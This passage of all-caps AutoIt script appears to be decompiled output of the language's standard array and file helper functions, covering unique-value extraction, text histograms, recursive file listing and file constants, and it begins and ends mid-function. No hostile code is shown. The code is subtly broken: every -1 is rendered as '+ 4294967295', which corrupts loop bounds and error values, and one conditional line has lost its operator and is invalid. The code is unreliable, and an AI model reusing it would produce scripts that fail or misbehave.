$BCOMERROR = FALSE FOR $I = $IBASE TO UBOUND ($AARRAY ) + 4294967295 IF $IDIMS = 1 THEN $VELEM = $AARRAY [$I ] ELSE $VELEM = $AARRAY [$I ] [$ICOLUMN ] ENDIF SWITCH $IINTTYPE CASE $ARRAYUNIQUE_FORCE32 $ODICTIONARY.Item ($VELEM ) IF @ERROR THEN $BCOMERROR = TRUE EXITLOOP ENDIF CASE $ARRAYUNIQUE_FORCE64 $STYPE = VARGETTYPE ($VELEM ) IF $STYPE = "Int32" THEN $BCOMERROR = TRUE EXITLOOP ENDIF $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_MATCH $STYPE = VARGETTYPE ($VELEM ) IF STRINGLEFT ($STYPE , 3 ) = 
"Int" THEN $VKEY = "#Int#" & STRING ($VELEM ) ELSE $VKEY = "#" & $STYPE & "#" & STRING ($VELEM ) ENDIF IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF CASE $ARRAYUNIQUE_DISTINCT $VKEY = "#" & VARGETTYPE ($VELEM ) & "#" & STRING ($VELEM ) IF NOT $ODICTIONARY.Item ($VKEY ) THEN $ODICTIONARY ($VKEY ) = $VELEM ENDIF ENDSWITCH NEXT LOCAL $AVALUES , $J = 0 IF $BCOMERROR THEN RETURN SETERROR (7 , 0 , 0 ) ELSEIF $IINTTYPE <> $ARRAYUNIQUE_FORCE32 THEN LOCAL $AVALUES [$ODICTIONARY.Count ] FOR $VKEY IN $ODICTIONARY.Keys () $AVALUES [$J ] = $ODICTIONARY ($VKEY ) IF STRINGLEFT ($VKEY , 5 ) = "#Ptr#" THEN $AVALUES [$J ] = PTR ($AVALUES [$J ] ) ENDIF $J += 1 NEXT ELSE $AVALUES = $ODICTIONARY.Keys () ENDIF IF $ICOUNT THEN _ARRAYINSERT ($AVALUES , 0 , $ODICTIONARY.Count ) ENDIF RETURN $AVALUES ENDFUNC FUNC _ARRAY1DTOHISTOGRAM ($AARRAY , $ISIZING = 100 ) IF UBOUND ($AARRAY , 0 ) > 1 THEN RETURN SETERROR (1 , 0 , "" ) $ISIZING = $ISIZING * 8 LOCAL $T , $N , $IMIN = 0 , $IMAX = 0 , $IOFFSET = 0 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] $T = ISNUMBER ($T ) ROUND ($T ) 0 IF $T < $IMIN THEN $IMIN = $T IF $T > $IMAX THEN $IMAX = $T NEXT LOCAL $IRANGE = INT (ROUND (($IMAX - $IMIN ) / 8 ) ) * 8 LOCAL $ISPACERATIO = 4 FOR $I = 0 TO UBOUND ($AARRAY ) + 4294967295 $T = $AARRAY [$I ] IF $T THEN $N = ABS (ROUND (($ISIZING * $T ) / $IRANGE ) / 8 ) $AARRAY [$I ] = "" IF $T > 0 THEN IF $IMIN THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * $IMIN ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ELSE IF $IMIN <> $T THEN $IOFFSET = INT (ABS (ROUND (($ISIZING * ($T - $IMIN ) ) / $IRANGE ) / 8 ) / 8 * $ISPACERATIO ) $AARRAY [$I ] = __ARRAY_STRINGREPEAT (CHRW (32 ) , $IOFFSET ) ENDIF ENDIF $AARRAY [$I ] &= __ARRAY_STRINGREPEAT (CHRW (9608 ) , INT ($N / 8 ) ) $N = MOD ($N , 8 ) IF $N > 0 THEN $AARRAY [$I ] &= CHRW (9608 + 8 - $N ) $AARRAY [$I ] &= " " & $T ELSE $AARRAY [$I ] = "" ENDIF NEXT RETURN 
$AARRAY ENDFUNC FUNC __ARRAY_STRINGREPEAT ($SSTRING , $IREPEATCOUNT ) $IREPEATCOUNT = INT ($IREPEATCOUNT ) IF STRINGLEN ($SSTRING ) < 1 OR $IREPEATCOUNT <= 0 THEN RETURN SETERROR (1 , 0 , "" ) LOCAL $SRESULT = "" WHILE $IREPEATCOUNT > 1 IF BITAND ($IREPEATCOUNT , 1 ) THEN $SRESULT &= $SSTRING $SSTRING &= $SSTRING $IREPEATCOUNT = BITSHIFT ($IREPEATCOUNT , 1 ) WEND RETURN $SSTRING & $SRESULT ENDFUNC FUNC __ARRAY_EXETERINTERNAL (BYREF $AARRAY , $ISTART , $ISIZE , $SDELIMITER , BYREF $AIDX , BYREF $ARESULT , BYREF $ICOUNT ) IF $ISTART == $ISIZE + 4294967295 THEN FOR $I = 0 TO $ISIZE + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , STRINGLEN ($SDELIMITER ) ) $ICOUNT += 1 ELSE LOCAL $ITEMP FOR $I = $ISTART TO $ISIZE + 4294967295 $ITEMP = $AIDX [$I ] $AIDX [$I ] = $AIDX [$ISTART ] $AIDX [$ISTART ] = $ITEMP __ARRAY_EXETERINTERNAL ($AARRAY , $ISTART + 1 , $ISIZE , $SDELIMITER , $AIDX , $ARESULT , $ICOUNT ) $AIDX [$ISTART ] = $AIDX [$I ] $AIDX [$I ] = $ITEMP NEXT ENDIF ENDFUNC FUNC __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $I_TOTAL = 1 FOR $I = $IR TO 1 STEP + 4294967295 $I_TOTAL *= ($IN / $I ) $IN -= 1 NEXT RETURN ROUND ($I_TOTAL ) ENDFUNC FUNC __ARRAY_GETNEXT ($IN , $IR , BYREF $ILEFT , $ITOTAL , BYREF $AIDX ) IF $ILEFT == $ITOTAL THEN $ILEFT -= 1 RETURN ENDIF LOCAL $I = $IR + 4294967295 WHILE $AIDX [$I ] == $IN - $IR + $I $I -= 1 WEND $AIDX [$I ] += 1 FOR $J = $I + 1 TO $IR + 4294967295 $AIDX [$J ] = $AIDX [$I ] + $J - $I NEXT $ILEFT -= 1 ENDFUNC FUNC __ARRAY_MINMAXINDEX (CONST BYREF $AARRAY , $ICOMPNUMERIC , $ISTART , $IEND , $ISUBITEM , $FUCOMPARISON ) IF $ICOMPNUMERIC = DEFAULT THEN $ICOMPNUMERIC = 0 IF $ICOMPNUMERIC <> 1 THEN $ICOMPNUMERIC = 0 IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ISUBITEM = DEFAULT THEN $ISUBITEM = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY 
, $UBOUND_ROWS ) + 4294967295 IF $IDIM_1 < 0 THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF $IEND = + 4294967295 THEN $IEND = $IDIM_1 IF $ISTART = + 4294967295 THEN $ISTART = 0 IF $ISTART < + 4294967295 OR $IEND < + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IDIM_1 OR $IEND > $IDIM_1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) IF $IDIM_1 < 0 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $IMAXMININDEX = $ISTART SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] , $AARRAY [$IMAXMININDEX ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE 2 IF $ISUBITEM < 0 OR $ISUBITEM > UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $ICOMPNUMERIC THEN FOR $I = $ISTART TO $IEND IF $FUCOMPARISON (NUMBER ($AARRAY [$I ] [$ISUBITEM ] ) , NUMBER ($AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) ) THEN $IMAXMININDEX = $I NEXT ELSE FOR $I = $ISTART TO $IEND IF $FUCOMPARISON ($AARRAY [$I ] [$ISUBITEM ] , $AARRAY [$IMAXMININDEX ] [$ISUBITEM ] ) THEN $IMAXMININDEX = $I NEXT ENDIF CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMAXMININDEX ENDFUNC FUNC __ARRAY_GREATERTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 > $VVALUE2 ENDFUNC FUNC __ARRAY_LESSTHAN ($VVALUE1 , $VVALUE2 ) RETURN $VVALUE1 < $VVALUE2 ENDFUNC FUNC __ARRAYUNIQUE_AUTOERRFUNC () ENDFUNC GLOBAL CONST $FC_NOOVERWRITE = 0 GLOBAL CONST $FC_OVERWRITE = 1 GLOBAL CONST $FC_CREATEPATH = 8 GLOBAL CONST $FT_MODIFIED = 0 GLOBAL CONST $FT_CREATED = 1 GLOBAL CONST $FT_ACCESSED = 2 GLOBAL CONST $FT_ARRAY = 0 GLOBAL CONST $FT_STRING = 1 GLOBAL CONST $FSF_CREATEBUTTON = 1 GLOBAL CONST $FSF_NEWDIALOG = 2 GLOBAL CONST $FSF_EDITCONTROL = 4 GLOBAL CONST $FT_NONRECURSIVE = 0 GLOBAL 
CONST $FT_RECURSIVE = 1 GLOBAL CONST $FO_READ = 0 GLOBAL CONST $FO_APPEND = 1 GLOBAL CONST $FO_OVERWRITE = 2 GLOBAL CONST $FO_CREATEPATH = 8 GLOBAL CONST $FO_BINARY = 16 GLOBAL CONST $FO_UNICODE = 32 GLOBAL CONST $FO_UTF16_LE = 32 GLOBAL CONST $FO_UTF16_BE = 64 GLOBAL CONST $FO_UTF8 = 128 GLOBAL CONST $FO_UTF8_NOBOM = 256 GLOBAL CONST $FO_ANSI = 512 GLOBAL CONST $FO_UTF16_LE_NOBOM = 1024 GLOBAL CONST $FO_UTF16_BE_NOBOM = 2048 GLOBAL CONST $FO_UTF8_FULL = 16384 GLOBAL CONST $FO_FULLFILE_DETECT = 16384 GLOBAL CONST $EOF = + 4294967295 GLOBAL CONST $FD_FILEMUSTEXIST = 1 GLOBAL CONST $FD_PATHMUSTEXIST = 2 GLOBAL CONST $FD_MULTISELECT = 4 GLOBAL CONST $FD_PROMPTCREATENEW = 8 GLOBAL CONST $FD_PROMPTOVERWRITE = 16 GLOBAL CONST $CREATE_NEW = 1 GLOBAL CONST $CREATE_ALWAYS = 2 GLOBAL CONST $OPEN_EXISTING = 3 GLOBAL CONST $OPEN_ALWAYS = 4 GLOBAL CONST $TRUNCATE_EXISTING = 5 GLOBAL CONST $INVALID_SET_FILE_POINTER = + 4294967295 GLOBAL CONST $FILE_BEGIN = 0 GLOBAL CONST $FILE_CURRENT = 1 GLOBAL CONST $FILE_END = 2 GLOBAL CONST $FILE_ATTRIBUTE_READONLY = 1 GLOBAL CONST $FILE_ATTRIBUTE_HIDDEN = 2 GLOBAL CONST $FILE_ATTRIBUTE_SYSTEM = 4 GLOBAL CONST $FILE_ATTRIBUTE_DIRECTORY = 16 GLOBAL CONST $FILE_ATTRIBUTE_ARCHIVE = 32 GLOBAL CONST $FILE_ATTRIBUTE_DEVICE = 64 GLOBAL CONST $FILE_ATTRIBUTE_NORMAL = 128 GLOBAL CONST $FILE_ATTRIBUTE_TEMPORARY = 256 GLOBAL CONST $FILE_ATTRIBUTE_SPARSE_FILE = 512 GLOBAL CONST $FILE_ATTRIBUTE_REPARSE_POINT = 1024 GLOBAL CONST $FILE_ATTRIBUTE_COMPRESSED = 2048 GLOBAL CONST $FILE_ATTRIBUTE_OFFLINE = 4096 GLOBAL CONST $FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 8192 GLOBAL CONST $FILE_ATTRIBUTE_ENCRYPTED = 16384 GLOBAL CONST $FILE_SHARE_READ = 1 GLOBAL CONST $FILE_SHARE_WRITE = 2 GLOBAL CONST $FILE_SHARE_DELETE = 4 GLOBAL CONST $FILE_SHARE_READWRITE = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE ) GLOBAL CONST $FILE_SHARE_ANY = BITOR ($FILE_SHARE_READ , $FILE_SHARE_WRITE , $FILE_SHARE_DELETE ) GLOBAL CONST $GENERIC_ALL = 268435456 GLOBAL CONST $GENERIC_EXECUTE = 
536870912 GLOBAL CONST $GENERIC_WRITE = 1073741824 GLOBAL CONST $GENERIC_READ = 2147483648 GLOBAL CONST $GENERIC_READWRITE = BITOR ($GENERIC_READ , $GENERIC_WRITE ) GLOBAL CONST $FILE_ENCODING_UTF16LE = 32 GLOBAL CONST $FE_ENTIRE_UTF8 = 1 GLOBAL CONST $FE_PARTIALFIRST_UTF8 = 2 GLOBAL CONST $FN_FULLPATH = 0 GLOBAL CONST $FN_RELATIVEPATH = 1 GLOBAL CONST $FV_COMMENTS = "Comments" GLOBAL CONST $FV_COMPANYNAME = "CompanyName" GLOBAL CONST $FV_FILEDESCRIPTION = "FileDescription" GLOBAL CONST $FV_FILEVERSION = "FileVersion" GLOBAL CONST $FV_INTERNALNAME = "InternalName" GLOBAL CONST $FV_LEGALCOPYRIGHT = "LegalCopyright" GLOBAL CONST $FV_LEGALTRADEMARKS = "LegalTrademarks" GLOBAL CONST $FV_ORIGINALFILENAME = "OriginalFilename" GLOBAL CONST $FV_PRODUCTNAME = "ProductName" GLOBAL CONST $FV_PRODUCTVERSION = "ProductVersion" GLOBAL CONST $FV_PRIVATEBUILD = "PrivateBuild" GLOBAL CONST $FV_SPECIALBUILD = "SpecialBuild" GLOBAL CONST $FRTA_NOCOUNT = 0 GLOBAL CONST $FRTA_COUNT = 1 GLOBAL CONST $FRTA_INTARRAYS = 2 GLOBAL CONST $FRTA_ENTIRESPLIT = 4 GLOBAL CONST $FLTA_FILESFOLDERS = 0 GLOBAL CONST $FLTA_FILES = 1 GLOBAL CONST $FLTA_FOLDERS = 2 GLOBAL CONST $FLTAR_FILESFOLDERS = 0 GLOBAL CONST $FLTAR_FILES = 1 GLOBAL CONST $FLTAR_FOLDERS = 2 GLOBAL CONST $FLTAR_NOHIDDEN = 4 GLOBAL CONST $FLTAR_NOSYSTEM = 8 GLOBAL CONST $FLTAR_NOLINK = 16 GLOBAL CONST $FLTAR_NORECUR = 0 GLOBAL CONST $FLTAR_RECUR = 1 GLOBAL CONST $FLTAR_NOSORT = 0 GLOBAL CONST $FLTAR_SORT = 1 GLOBAL CONST $FLTAR_FASTSORT = 2 GLOBAL CONST $FLTAR_NOPATH = 0 GLOBAL CONST $FLTAR_RELPATH = 1 GLOBAL CONST $FLTAR_FULLPATH = 2 FUNC _FILECOUNTLINES ($SFILEPATH ) LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , $FO_READ ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $SFILEREAD = STRINGSTRIPWS (FILEREAD ($HFILEOPEN ) , $STR_STRIPTRAILING ) FILECLOSE ($HFILEOPEN ) RETURN UBOUND (STRINGREGEXP ($SFILEREAD , "\R" , $STR_REGEXPARRAYGLOBALMATCH ) ) + 1 - INT ($SFILEREAD = "" ) ENDFUNC FUNC _FILECREATE ($SFILEPATH ) 
LOCAL $HFILEOPEN = FILEOPEN ($SFILEPATH , BITOR ($FO_OVERWRITE , $FO_CREATEPATH ) ) IF $HFILEOPEN = + 4294967295 THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $IFILEWRITE = FILEWRITE ($HFILEOPEN , "" ) FILECLOSE ($HFILEOPEN ) IF NOT $IFILEWRITE THEN RETURN SETERROR (2 , 0 , 0 ) RETURN 1 ENDFUNC FUNC _FILELISTTOARRAY ($SFILEPATH , $SFILTER = "*" , $IFLAG = $FLTA_FILESFOLDERS , $BRETURNPATH = FALSE ) LOCAL $SDELIMITER = "|" , $SFILELIST = "" , $SFILENAME = "" , $SFULLPATH = "" $SFILEPATH = STRINGREGEXPREPLACE ($SFILEPATH , "[\\/]+$" , "" ) & "\" IF $IFLAG = DEFAULT THEN $IFLAG = $FLTA_FILESFOLDERS IF $BRETURNPATH THEN $SFULLPATH = $SFILEPATH IF $SFILTER = DEFAULT THEN $SFILTER = "*" IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 0 , 0 ) IF STRINGREGEXP ($SFILTER , "[\\/:><\|]|(?s)^\s*$" ) THEN RETURN SETERROR (2 , 0 , 0 ) IF NOT ($IFLAG = 0 OR $IFLAG = 1 OR $IFLAG = 2 ) THEN RETURN SETERROR (3 , 0 , 0 ) LOCAL $HSEARCH = FILEFINDFIRSTFILE ($SFILEPATH & $SFILTER ) IF @ERROR THEN RETURN SETERROR (4 , 0 , 0 ) WHILE 1 $SFILENAME = FILEFINDNEXTFILE ($HSEARCH ) IF @ERROR THEN EXITLOOP IF ($IFLAG + @EXTENDED = 2 ) THEN CONTINUELOOP $SFILELIST &= $SDELIMITER & $SFULLPATH & $SFILENAME WEND FILECLOSE ($HSEARCH ) IF $SFILELIST = "" THEN RETURN SETERROR (4 , 0 , 0 ) RETURN STRINGSPLIT (STRINGTRIMLEFT ($SFILELIST , 1 ) , $SDELIMITER ) ENDFUNC FUNC _FILELISTTOARRAYREC ($SFILEPATH , $SMASK = "*" , $IRETURN = $FLTAR_FILESFOLDERS , $IRECUR = $FLTAR_NORECUR , $ISORT = $FLTAR_NOSORT , $IRETURNPATH = $FLTAR_RELPATH ) IF NOT FILEEXISTS ($SFILEPATH ) THEN RETURN SETERROR (1 , 1 , "" ) IF $SMASK = DEFAULT THEN $SMASK = "*" IF $IRETURN = DEFAULT THEN $IRETURN = $FLTAR_FILESFOLDERS IF $IRECUR = DEFAULT THEN $IRECUR = $FLTAR_NORECUR IF $ISORT = DEFAULT THEN $ISORT = $FLTAR_NOSORT IF $IRETURNPATH = DEFAULT THEN $IRETURNPATH = $FLTAR_RELPATH IF $IRECUR > 1 OR NOT ISINT ($IRECUR ) THEN RETURN SETERROR (1 , 6 , "" ) LOCAL $BLONGPATH = FALSE IF STRINGLEFT ($SFILEPATH , 4 ) == "\\?\" THEN 
$BLONGPATH = TRUE ENDIF LOCAL $SFOLDERSLASH = "" IF STRINGRIGHT ($SFILEPATH , 1 ) = "\" THEN $SFOLDERSLASH = "\" ELSE $SFILEPATH = $SFILEPATH & "\" ENDIF LOCAL $ASFOLDERSEARCHLIST [100 ] = [1 ] $ASFOLDERSEARCHLIST [1 ] = $SFILEPATH LOCAL $IHIDE_HS = 0 , $SHIDE_HS = "" IF BITAND ($IRETURN , 4 ) THEN $IHIDE_HS += 2 $SHIDE_HS &= "H" $IRETURN -= 4 ENDIF IF BITAND ($IRETURN , 8 ) THEN $IHIDE_HS += 4 $SHIDE_HS &= "S" $IRETURN -= 8 ENDIF LOCAL $IHIDE_LINK = 0 IF BITAND ($IRETURN , 16 ) THEN $IHIDE_LINK = 1024 $IRETURN -= 16 ENDIF LOCAL $IMAXLEVEL = 0 IF $IRECUR < 0 THEN STRINGREPLACE ($SFILEPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) $IMAXLEVEL = @EXTENDED - $IRECUR ENDIF LOCAL $SEXCLUDE_LIST = "" , $SEXCLUDE_LIST_FOLDER = "" , $SINCLUDE_LIST = "*" LOCAL $AMASKSPLIT = STRINGSPLIT ($SMASK , "|" ) SWITCH $AMASKSPLIT [0 ] CASE 3 $SEXCLUDE_LIST_FOLDER = $AMASKSPLIT [3 ] CONTINUECASE CASE 2 $SEXCLUDE_LIST = $AMASKSPLIT [2 ] CONTINUECASE CASE 1 $SINCLUDE_LIST = $AMASKSPLIT [1 ] ENDSWITCH LOCAL $SINCLUDE_FILE_MASK = ".+" IF $SINCLUDE_LIST <> "*" THEN IF NOT __FLTAR_LISTTOMASK ($SINCLUDE_FILE_MASK , $SINCLUDE_LIST ) THEN RETURN SETERROR (1 , 2 , "" ) ENDIF LOCAL $SINCLUDE_FOLDER_MASK = ".+" SWITCH $IRETURN CASE 0 SWITCH $IRECUR CASE 0 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH CASE 2 $SINCLUDE_FOLDER_MASK = $SINCLUDE_FILE_MASK ENDSWITCH LOCAL $SEXCLUDE_FILE_MASK = ":" IF $SEXCLUDE_LIST <> "" THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FILE_MASK , $SEXCLUDE_LIST ) THEN RETURN SETERROR (1 , 3 , "" ) ENDIF LOCAL $SEXCLUDE_FOLDER_MASK = ":" IF $IRECUR THEN IF $SEXCLUDE_LIST_FOLDER THEN IF NOT __FLTAR_LISTTOMASK ($SEXCLUDE_FOLDER_MASK , $SEXCLUDE_LIST_FOLDER ) THEN RETURN SETERROR (1 , 4 , "" ) ENDIF IF $IRETURN = 2 THEN $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF ELSE $SEXCLUDE_FOLDER_MASK = $SEXCLUDE_FILE_MASK ENDIF IF NOT ($IRETURN = 0 OR $IRETURN = 1 OR $IRETURN = 2 ) THEN RETURN SETERROR (1 , 5 , "" ) IF NOT ($ISORT = 0 OR $ISORT = 1 OR $ISORT = 2 ) THEN RETURN 
SETERROR (1 , 7 , "" ) IF NOT ($IRETURNPATH = 0 OR $IRETURNPATH = 1 OR $IRETURNPATH = 2 ) THEN RETURN SETERROR (1 , 8 , "" ) IF $IHIDE_LINK THEN LOCAL $TFILE_DATA = DLLSTRUCTCREATE ("struct;align 4;dword FileAttributes;uint64 CreationTime;uint64 LastAccessTime;uint64 LastWriteTime;" & "dword FileSizeHigh;dword FileSizeLow;dword Reserved0;dword Reserved1;wchar FileName[260];wchar AlternateFileName[14];endstruct" ) LOCAL $HDLL = DLLOPEN ("kernel32.dll" ) , $ADLL_RET ENDIF LOCAL $ASRETURNLIST [100 ] = [0 ] LOCAL $ASFILEMATCHLIST = $ASRETURNLIST , $ASROOTFILEMATCHLIST = $ASRETURNLIST , $ASFOLDERMATCHLIST = $ASRETURNLIST LOCAL $BFOLDER = FALSE , $HSEARCH = 0 , $SCURRENTPATH = "" , $SNAME = "" , $SRETPATH = "" LOCAL $IATTRIBS = 0 , $SATTRIBS = "" LOCAL $ASFOLDERFILESECTIONLIST [100 ] [2 ] = [[0 , 0 ] ] WHILE $ASFOLDERSEARCHLIST [0 ] > 0 $SCURRENTPATH = $ASFOLDERSEARCHLIST [$ASFOLDERSEARCHLIST [0 ] ] $ASFOLDERSEARCHLIST [0 ] -= 1 SWITCH $IRETURNPATH CASE 1 $SRETPATH = STRINGREPLACE ($SCURRENTPATH , $SFILEPATH , "" ) CASE 2 IF $BLONGPATH THEN $SRETPATH = STRINGTRIMLEFT ($SCURRENTPATH , 4 ) ELSE $SRETPATH = $SCURRENTPATH ENDIF ENDSWITCH IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "handle" , "FindFirstFileW" , "wstr" , $SCURRENTPATH & "*" , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN CONTINUELOOP ENDIF $HSEARCH = $ADLL_RET [0 ] ELSE $HSEARCH = FILEFINDFIRSTFILE ($SCURRENTPATH & "*" ) IF $HSEARCH = + 4294967295 THEN CONTINUELOOP ENDIF ENDIF IF $IRETURN = 0 AND $ISORT AND $IRETURNPATH THEN __FLTAR_ADDTOLIST ($ASFOLDERFILESECTIONLIST , $SRETPATH , $ASFILEMATCHLIST [0 ] + 1 ) ENDIF $SATTRIBS = "" WHILE 1 IF $IHIDE_LINK THEN $ADLL_RET = DLLCALL ($HDLL , "int" , "FindNextFileW" , "handle" , $HSEARCH , "struct*" , $TFILE_DATA ) IF @ERROR OR NOT $ADLL_RET [0 ] THEN EXITLOOP ENDIF $SNAME = DLLSTRUCTGETDATA ($TFILE_DATA , "FileName" ) IF $SNAME = ".." 
THEN CONTINUELOOP ENDIF $IATTRIBS = DLLSTRUCTGETDATA ($TFILE_DATA , "FileAttributes" ) IF $IHIDE_HS AND BITAND ($IATTRIBS , $IHIDE_HS ) THEN CONTINUELOOP ENDIF IF BITAND ($IATTRIBS , $IHIDE_LINK ) THEN CONTINUELOOP ENDIF $BFOLDER = FALSE IF BITAND ($IATTRIBS , 16 ) THEN $BFOLDER = TRUE ENDIF ELSE $BFOLDER = FALSE $SNAME = FILEFINDNEXTFILE ($HSEARCH , 1 ) IF @ERROR THEN EXITLOOP ENDIF $SATTRIBS = @EXTENDED IF STRINGINSTR ($SATTRIBS , "D" ) THEN $BFOLDER = TRUE ENDIF IF STRINGREGEXP ($SATTRIBS , "[" & $SHIDE_HS & "]" ) THEN CONTINUELOOP ENDIF ENDIF IF $BFOLDER THEN SELECT CASE $IRECUR < 0 STRINGREPLACE ($SCURRENTPATH , "\" , "" , 0 , $STR_NOCASESENSEBASIC ) IF @EXTENDED < $IMAXLEVEL THEN CONTINUECASE ENDIF CASE $IRECUR = 1 IF NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERSEARCHLIST , $SCURRENTPATH & $SNAME & "\" ) ENDIF ENDSELECT ENDIF IF $ISORT THEN IF $BFOLDER THEN IF STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASFOLDERMATCHLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN IF $SCURRENTPATH = $SFILEPATH THEN __FLTAR_ADDTOLIST ($ASROOTFILEMATCHLIST , $SRETPATH & $SNAME ) ELSE __FLTAR_ADDTOLIST ($ASFILEMATCHLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF ELSE IF $BFOLDER THEN IF $IRETURN <> 1 AND STRINGREGEXP ($SNAME , $SINCLUDE_FOLDER_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FOLDER_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME & $SFOLDERSLASH ) ENDIF ELSE IF $IRETURN <> 2 AND STRINGREGEXP ($SNAME , $SINCLUDE_FILE_MASK ) AND NOT STRINGREGEXP ($SNAME , $SEXCLUDE_FILE_MASK ) THEN __FLTAR_ADDTOLIST ($ASRETURNLIST , $SRETPATH & $SNAME ) ENDIF ENDIF ENDIF WEND IF $IHIDE_LINK THEN DLLCALL ($HDLL , "int" , "FindClose" , "ptr" , $HSEARCH ) ELSE FILECLOSE ($HSEARCH ) ENDIF WEND IF $IHIDE_LINK THEN DLLCLOSE ($HDLL ) ENDIF IF 
$ISORT THEN SWITCH $IRETURN CASE 2 IF $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST = $ASFOLDERMATCHLIST __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) CASE 1 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFILEMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST , 1 ) ENDIF CASE 0 IF $ASROOTFILEMATCHLIST [0 ] = 0 AND $ASFOLDERMATCHLIST [0 ] = 0 THEN RETURN SETERROR (1 , 9 , "" ) IF $IRETURNPATH = 0 THEN __FLTAR_ADDFILELISTS ($ASRETURNLIST , $ASROOTFILEMATCHLIST , $ASFILEMATCHLIST ) $ASRETURNLIST [0 ] += $ASFOLDERMATCHLIST [0 ] REDIM $ASFOLDERMATCHLIST [$ASFOLDERMATCHLIST [0 ] + 1 ] _ARRAYCONCATENATE ($ASRETURNLIST , $ASFOLDERMATCHLIST , 1 ) __ARRAYDUALPIVOTSORT ($ASRETURNLIST , 1 , $ASRETURNLIST [0 ] ) ELSE LOCAL $ASRETURNLIST [$ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] + 1 ] $ASRETURNLIST [0 ] = $ASFILEMATCHLIST [0 ] + $ASROOTFILEMATCHLIST [0 ] + $ASFOLDERMATCHLIST [0 ] __ARRAYDUALPIVOTSORT ($ASROOTFILEMATCHLIST , 1 , $ASROOTFILEMATCHLIST [0 ] ) FOR $I = 1 TO $ASROOTFILEMATCHLIST [0 ] $ASRETURNLIST [$I ] = $ASROOTFILEMATCHLIST [$I ] NEXT LOCAL $INEXTINSERTIONINDEX = $ASROOTFILEMATCHLIST [0 ] + 1 __ARRAYDUALPIVOTSORT ($ASFOLDERMATCHLIST , 1 , $ASFOLDERMATCHLIST [0 ] ) LOCAL $SFOLDERTOFIND = "" FOR $I = 1 TO $ASFOLDERMATCHLIST [0 ] 